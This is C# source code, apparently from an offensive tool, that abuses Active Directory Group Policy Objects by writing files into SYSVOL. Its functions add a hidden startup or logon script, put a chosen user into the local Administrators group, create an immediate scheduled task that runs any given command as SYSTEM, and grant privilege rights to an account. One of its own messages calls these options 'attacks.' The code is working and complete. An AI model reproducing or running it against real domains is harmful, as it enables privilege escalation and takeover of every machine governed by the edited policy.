public static void NewStartupScript(string ScriptName, string ScriptContents, string Domain, string DomainController, string GPOName, string DistinguishedName, string objectType)
{
string hidden_ini;
string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);
string path = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
string hidden_path = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
if (objectType.Equals("Computer"))
{
hidden_ini = Environment.NewLine + "[Startup]" + Environment.NewLine + "0CmdLine=" + ScriptName + Environment.NewLine + "0Parameters=" + Environment.NewLine;
}
else
{
hidden_ini = Environment.NewLine + "[Logon]" + Environment.NewLine + "0CmdLine=" + ScriptName + Environment.NewLine + "0Parameters=" + Environment.NewLine;
}
string GPT_path = path + "\\GPT.ini";
// Check if GPO path exists
if (Directory.Exists(path) && objectType.Equals("Computer"))
{
path += "\\Machine\\Scripts\\Startup\\";
hidden_path += "\\Machine\\Scripts\\scripts.ini";
}
else if (Directory.Exists(path) && objectType.Equals("User"))
{
path += "\\User\\Scripts\\Logon\\";
hidden_path += "\\User\\Scripts\\scripts.ini";
}
else
{
Console.Error.WriteLine("[!] Could not find the specified GPO.");
return;
}
// check if the folder structure for adding admin user exists in SYSVOL
if (!Directory.Exists(path))
{
Directory.CreateDirectory(path);
}
path += ScriptName;
if (File.Exists(path))
{
Console.Error.WriteLine("[!] A Startup script with the same name already exists. Choose a different name.");
return;
}
if (File.Exists(hidden_path))
{
// Remove the hidden attribute of the file
var attributes = File.GetAttributes(hidden_path);
if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden)
{
attributes &= ~FileAttributes.Hidden;
File.SetAttributes(hidden_path, attributes);
}
string line;
List <string> new_list = new List <string>();
using (StreamReader file = new StreamReader(hidden_path))
{
while ((line = file.ReadLine()) != null)
{
new_list.Add(line);
}
}
List <int> first_element = new List <int>();
string q = "";
foreach (string item in new_list)
{
try
{
q = Regex.Replace(item[0].ToString(), "[^0-9]", "");
first_element.Add(Int32.Parse(q));
}
catch { continue; }
}
int max = first_element.Max() + 1;
new_list.Add(hidden_ini = max.ToString() + "CmdLine=" + ScriptName + Environment.NewLine + max.ToString() + "Parameters=");
using (StreamWriter file2 = new StreamWriter(hidden_path))
{
foreach (string l in new_list)
{
file2.WriteLine(l);
}
}
//Add the hidden attribute of the file
File.SetAttributes(hidden_path, File.GetAttributes(hidden_path) | FileAttributes.Hidden);
}
else
{
File.WriteAllText(hidden_path, hidden_ini);
//Add the hidden attribute of the file
var attributes = File.GetAttributes(hidden_path);
File.SetAttributes(hidden_path, File.GetAttributes(hidden_path) | FileAttributes.Hidden);
}
Console.WriteLine("[+] Creating new startup script...");
File.WriteAllText(path, ScriptContents);
if (objectType.Equals("Computer"))
{
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewStartupScript", "Computer");
}
else
{
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewStartupScript", "User");
}
}
public static void NewLocalAdmin(string UserAccount, string Domain, string DomainController, string GPOName, string DistinguishedName, bool Force)
{
// Get SID of user who will be local admin
PrincipalContext principalContext = new PrincipalContext(ContextType.Domain, DomainController);
UserPrincipal userPrincipal = null;
try
{
userPrincipal = UserPrincipal.FindByIdentity(principalContext, IdentityType.SamAccountName, UserAccount);
Console.WriteLine($"[+] SID Value of {UserAccount} = {userPrincipal.Sid.Value}");
}
catch
{
Console.Error.WriteLine($"[-] Could not find user {UserAccount} in the {Domain} domain.");
}
string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);
string template = @"[Unicode]
Unicode=yes
[Version]
signature=""$CHICAGO$""
Revision=1";
string[] newLocalAdmin = { "[Group Membership]", "*S-1-5-32-544__Memberof =", "*S-1-5-32-544__Members = *" + userPrincipal.Sid.Value };
string gpoPath = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
string gptPath = gpoPath + "\\GPT.ini";
// Check if GPO path exists
if (Directory.Exists(gpoPath))
{
gpoPath += "\\Machine\\Microsoft\\Windows NT\\SecEdit\\";
}
else
{
Console.WriteLine("[!] Could not find the specified GPO.");
return;
}
// check if the folder structure for adding admin user exists in SYSVOL
if (!Directory.Exists(gpoPath))
{
Directory.CreateDirectory(gpoPath);
}
gpoPath += "GptTmpl.inf";
if (File.Exists(gpoPath))
{
bool exists = false;
Console.WriteLine("[+] File exists: {0}", gpoPath);
string[] readText = File.ReadAllLines(gpoPath);
foreach (string s in readText)
{
// Check if memberships are defined via group policy
if (s.Contains("[Group Membership]"))
{
exists = true;
}
}
// if memberships are defined and force is NOT used
if (exists && !Force)
{
Console.WriteLine("[!] Group Memberships are already defined in the GPO. Use --force to make changes. This option might break the affected systems!");
return;
}
// if memberships are defined and force is used
if (exists && Force)
{
using (StreamWriter file2 = new StreamWriter(gpoPath))
{
foreach (string l in readText)
{
if (l.Replace(" ", "").Contains("*S-1-5-32-544__Members="))
{
if (l.Replace(" ", "").Contains("*S-1-5-32-544__Members=") && (string.Compare(l.Replace(" ", ""), "*S-1-5-32-544__Members=") > 0))
{
file2.WriteLine(l + ", *" + userPrincipal.Sid.Value);
}
else if (l.Replace(" ", "").Contains("*S-1-5-32-544__Members=") && (string.Compare(l.Replace(" ", ""), "*S-1-5-32-544__Members=") == 0))
{
file2.WriteLine(l + " *" + userPrincipal.Sid.Value);
}
}
else
{
file2.WriteLine(l);
}
}
}
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
return;
}
// if memberships are not defined
if (!exists)
{
Console.WriteLine("[+] The GPO does not specify any group memberships.");
using (StreamWriter file2 = new StreamWriter(gptPath))
{
foreach (string l in readText)
{
file2.WriteLine(l);
}
foreach (string l in newLocalAdmin)
{
file2.WriteLine(l);
}
}
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
}
}
else
{
Console.WriteLine("[+] Creating file " + gpoPath);
string new_text = null;
foreach (string x in newLocalAdmin)
{
new_text += Environment.NewLine + x;
}
File.WriteAllText(gpoPath, template + new_text);
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
}
}
public static void NewImmediateTask(string Domain, string DomainController, string GPOName, string DistinguishedName, string TaskName, string Author, string Arguments, string Command, bool Force, string ObjectType)
{
string ImmediateTaskXML;
string start = @"<?xml version=""1.0"" encoding=""utf-8""?><ScheduledTasks clsid=""{CC63F200-7309-4ba0-B154-A71CD118DBCC}"">";
string end = @"</ScheduledTasks>";
if (ObjectType.Equals("Computer"))
{
ImmediateTaskXML = string.Format(@"<ImmediateTaskV2 clsid=""{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}"" name=""{1}"" image=""0"" changed=""2019-03-30 23:04:20"" uid=""{4}""><Properties action=""C"" name=""{1}"" runAs=""NT AUTHORITY\System"" logonType=""S4U""><Task version=""1.3""><RegistrationInfo><Author>{0}</Author><Description></Description></RegistrationInfo><Principals><Principal id=""Author""><UserId>NT AUTHORITY\System</UserId><LogonType>S4U</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context=""Author""><Exec><Command>{2}</Command><Arguments>{3}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>", Author, TaskName, Command, Arguments, Guid.NewGuid().ToString());
}
else
{
ImmediateTaskXML = string.Format(@"<ImmediateTaskV2 clsid=""{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}"" name=""{1}"" image=""0"" changed=""2019-07-25 14:05:31"" uid=""{4}""><Properties action=""C"" name=""{1}"" runAs=""%LogonDomain%\%LogonUser%"" logonType=""InteractiveToken""><Task version=""1.3""><RegistrationInfo><Author>{0}</Author><Description></Description></RegistrationInfo><Principals><Principal id=""Author""><UserId>%LogonDomain%\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context=""Author""><Exec><Command>{2}</Command><Arguments>{3}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>", Author, TaskName, Command, Arguments, Guid.NewGuid().ToString());
}
string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);
if (string.IsNullOrEmpty(GPOGuid))
{
return;
}
string path = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
string GPT_path = path + "\\GPT.ini";
// Check if GPO path exists
if (Directory.Exists(path) && ObjectType.Equals("Computer"))
{
path += "\\Machine\\Preferences\\ScheduledTasks\\";
}
else if (Directory.Exists(path) && ObjectType.Equals("User"))
{
path += "\\User\\Preferences\\ScheduledTasks\\";
}
else
{
Console.Error.WriteLine("[!] Could not find the specified GPO.");
return;
}
// check if the folder structure for adding scheduled tasks exists in SYSVOL
if (!Directory.Exists(path))
{
Directory.CreateDirectory(path);
}
path += "ScheduledTasks.xml";
// if the ScheduledTasks.xml exists then append the new immediate task
if (File.Exists(path))
{
if (Force)
{
Console.WriteLine("[+] Modifying " + path);
string line;
List <string> new_list = new List <string>();
using (StreamReader file = new StreamReader(path))
{
while ((line = file.ReadLine()) != null)
{
if (line.Replace(" ", "").Contains("</ScheduledTasks>"))
{
line = ImmediateTaskXML + line;
}
new_list.Add(line);
}
}
using (StreamWriter file2 = new StreamWriter(path))
{
foreach (string l in new_list)
{
file2.WriteLine(l);
}
}
if (ObjectType.Equals("Computer"))
{
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", "Computer");
}
else
{
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", "User");
}
return;
}
else
{
Console.WriteLine("[!] The GPO already includes a ScheduledTasks.xml. Use --Force to append to ScheduledTasks.xml or choose another GPO.");
return;
}
}
else
{
Console.WriteLine($"[+] Creating file {path}");
File.WriteAllText(path, start + ImmediateTaskXML + end);
if (ObjectType.Equals("Computer"))
{
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", "Computer");
}
else
{
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", "User");
}
}
}
public static void AddNewRights(string Domain, string DomainController, string GPOName, string DistinguishedName, string[] NewRights, string UserAccount)
{
// Get SID of user who will be local admin
PrincipalContext ctx = new PrincipalContext(ContextType.Domain, DomainController);
UserPrincipal usr = null;
try
{
usr = UserPrincipal.FindByIdentity(ctx, IdentityType.SamAccountName, UserAccount);
Console.WriteLine("[+] SID Value of " + UserAccount + " = " + usr.Sid.Value);
}
catch
{
Console.Error.WriteLine($"[!] Could not find user {UserAccount} in the {Domain} domain.");
return;
}
string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);
string text = @"[Unicode]
Unicode=yes
[Version]
signature=""$CHICAGO$""
Revision = 1
[Privilege Rights]";
string right_lines = null;
foreach (string right in NewRights)
{
text += Environment.NewLine + right + " = *" + usr.Sid.Value;
right_lines += right + " = *" + usr.Sid.Value + Environment.NewLine;
}
string path = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
string GPT_path = path + "\\GPT.ini";
// Check if GPO path exists
if (Directory.Exists(path))
{
path += "\\Machine\\Microsoft\\Windows NT\\SecEdit\\";
}
else
{
Console.Error.WriteLine("[!] Could not find the specified GPO.");
return;
}
// check if the folder structure for adding admin user exists in SYSVOL
if (!Directory.Exists(path))
{
Directory.CreateDirectory(path);
}
path += "GptTmpl.inf";
if (File.Exists(path))
{
bool exists = false;
Console.WriteLine("[+] File exists: " + path);
string[] readText = File.ReadAllLines(path);
foreach (string s in readText)
{
// Check if memberships are defined via group policy
if (s.Contains("[Privilege Rights]"))
{
exists = true;
}
}
// if user rights are defined
if (exists)
{
// Curently there is no support for appending user rights to exisitng ones
Console.Error.WriteLine("[!] The GPO already specifies user rights. Select a different attack.");
return;
}
// if user rights are not defined
if (!exists)
{
Console.WriteLine("[+] The GPO does not specify any user rights. Adding new rights...");
using (StreamWriter file2 = new StreamWriter(path))
{
foreach (string l in readText)
{
file2.WriteLine(l);
}
file2.WriteLine("[Privilege Rights]" + Environment.NewLine + right_lines);
}
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "AddNewRights", "Computer");
}
}
else
{
Console.WriteLine("[+] Creating file " + path);
File.WriteAllText(path, text);
GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "AddNewRights", "Computer");
}
}
